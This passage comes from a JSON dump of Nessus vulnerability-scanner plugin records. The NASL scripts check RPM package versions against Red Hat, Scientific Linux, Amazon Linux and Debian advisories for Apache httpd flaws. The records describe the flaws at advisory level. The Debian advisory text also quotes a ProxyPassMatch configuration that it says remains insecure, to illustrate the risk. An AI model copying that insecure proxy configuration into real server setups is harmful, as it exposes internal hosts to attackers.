value:\"http://www.nessus.org/u?99d5fd4b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-63.sl5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:13:15", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix multiple 
security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-20T00:00:00", "published": "2012-02-22T00:00:00", "id": "REDHAT-RHSA-2012-0323.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58085", "title": "RHEL 5 : httpd (RHSA-2012:0323)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0323. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58085);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/12/20 11:08:45\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"RHEL 5 : httpd (RHSA-2012:0323)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. 
(CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1392.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0323\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0323\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-debuginfo-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n\n if (flag)\n {\n 
security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:14:29", "bulletinFamily": "scanner", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-31T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20120213_HTTPD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61245", "title": "Scientific Linux Security Update : httpd on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61245);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a\nprevious update) did not completely address the problem. 
An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2220\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ddbd264\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:17:09", "bulletinFamily": "scanner", "description": "It was discovered that the fix for CVE-2011-3368 did not completely\naddress the problem. 
An attacker could bypass the fix and make a\nreverse proxy connect to an arbitrary server not directly accessible\nto the attacker by sending an HTTP version 0.9 request, or by using a\nspecially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)", "modified": "2018-04-18T00:00:00", "published": "2013-09-04T00:00:00", "id": "ALA_ALAS-2012-46.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69653", "title": "Amazon Linux AMI : httpd (ALAS-2012-46)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-46.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69653);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_xref(name:\"ALAS\", value:\"2012-46\");\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2012-46)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the fix for CVE-2011-3368 did not completely\naddress the problem. An attacker could bypass the fix and make a\nreverse proxy connect to an arbitrary server not directly accessible\nto the attacker by sending an HTTP version 0.9 request, or by using a\nspecially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. 
Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-46.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.22-1.23.amzn1\")) 
flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:13:06", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local\n attackers to execute arbitrary code at elevated\n privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain reverse\n proxy configurations using the ProxyPassMatch directive\n or using the RewriteRule directive with the [P] flag, a\n remote attacker could make the proxy connect to an\n arbitrary server. This could allow the attacker to\n access internal servers that are not otherwise\n accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append\n arbitrary strings to the host or port parts of the target URI. For\n example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations :\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch\n ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process\n to crash during shutdown. 
This is a violation of the\n privilege separation between the apache2 processes and\n could potentially be used to worsen the impact of other\n vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request)\n could be used to expose 'httpOnly' cookies. This could\n allow a remote attacker using cross site scripting to\n steal authentication cookies.", "modified": "2018-11-28T00:00:00", "published": "2012-02-07T00:00:00", "id": "DEBIAN_DSA-2405.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57851", "title": "Debian DSA-2405-1 : apache2 - multiple issues", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2405. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57851);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/28 22:47:42\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51706);\n script_xref(name:\"DSA\", value:\"2405\");\n\n script_name(english:\"Debian DSA-2405-1 : apache2 - multiple issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", 